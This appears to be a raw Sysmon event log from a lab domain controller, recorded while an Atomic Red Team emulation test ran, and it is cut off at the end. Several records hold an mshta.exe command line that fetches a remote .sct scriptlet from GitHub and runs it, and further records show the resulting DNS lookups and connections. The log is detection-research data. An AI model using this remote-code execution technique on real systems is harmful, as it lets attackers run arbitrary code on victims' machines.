javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" 10341000x80000000000000001695829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.444{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.442{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.426{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.286{05ADC7E1-7072-603D-5C88-00000000AD01}8736ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.265{00000000-0000-0000-0000-000000000000}8860<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55126-false185.199.110.133cdn-185-199-110-133.github.com443https 10341000x80000000000000001695816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.020{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:39.020{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001695868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.886{00000000-0000-0000-0000-000000000000}8448<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55127-false185.199.110.133cdn-185-199-110-133.github.com443https 22542200x80000000000000001695867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.500{00000000-0000-0000-0000-000000000000}8736raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;<unknown process> 22542200x80000000000000001695866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:31.884{00000000-0000-0000-0000-000000000000}8448raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000001695865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.614{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E87A8F3670BC8276688EADF92A605694,SHA256=1DEA0AD13DD3CCE4F1B39FC3B127B526625B2A27EBAB334BAB999CA45B60BEF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.395{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C0421D4EB09591CD2E0EC9DF5AA330B,SHA256=CF0273EA47A1F484709914571FA01C513F5163C818FA14D7B1E6F5DF4A683D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.073{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=11171E527B632022A1C9F680D03EE1BC,SHA256=57E69D7F76029A68731B8AC20E7235F15C34B9543E01088CBCEA05B7ABED73CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.051{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.051{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.036{05ADC7E1-7073-603D-5F88-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\9LYUFICW\warning[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.036{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:40.020{05ADC7E1-7073-603D-5F88-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\BAPG9VIH\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.978{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-974.attackrange.local55129-false185.199.110.133cdn-185-199-110-133.github.com443https 10341000x80000000000000001695874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:41.989{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:41.989{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001695872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.977{05ADC7E1-7073-603D-5F88-00000000AD01}4224raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;C:\Windows\system32\mshta.exe 10341000x80000000000000001695871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:41.723{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:41.426{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E5C67464684C78374DE160AEFECA23,SHA256=C02848515B950B7D8F2B651DFC76DD404D152D6A2360564589C3C51FAF51747C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:32.504{00000000-0000-0000-0000-000000000000}8736<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55128-false185.199.110.133cdn-185-199-110-133.github.com443https 23542300x80000000000000001695878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:42.926{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9783FDE0D8A89CF2C24EFFE7DC3A1645,SHA256=EC56AB70CF710644F7B03E6D7FE1712438A43EBDDD6DC2F13A4129B51AF2E670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:42.463{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8912E0295FF5248E1074593D5C89FFF2,SHA256=7D40342CC799914F08FAF78F4C8E3AE1A0A9837D1D2252000848D5DF0CA51EFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.564{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55130-false10.0.1.12-8000- 23542300x80000000000000001695879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:43.489{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F509861D28695F57F59AFB0D3D8959C0,SHA256=1554BBB51B818097AB391DAFF3895B1429B6959E26F48B8E2C04C5DBF2121051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:44.520{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F41588CCA1BE112F3A98A1AE839F4BB,SHA256=F2C7B6509529826561D5BEE543DDD9125EB64CB31EE4D7594D8D21ED6D758FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:45.551{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3CA52945B3A99235477C6ECC126856F,SHA256=313BB06FC36F601D1C6EE86A20AE0C4F52F796C060CD025FADACB62603C22A0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:45.462{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEF22D76E5CA0D984E85772123839000,SHA256=42D31EB621C93720DF765C789A841A4A61275EB4E081B4929533455DA7AEBBAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:46.570{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program 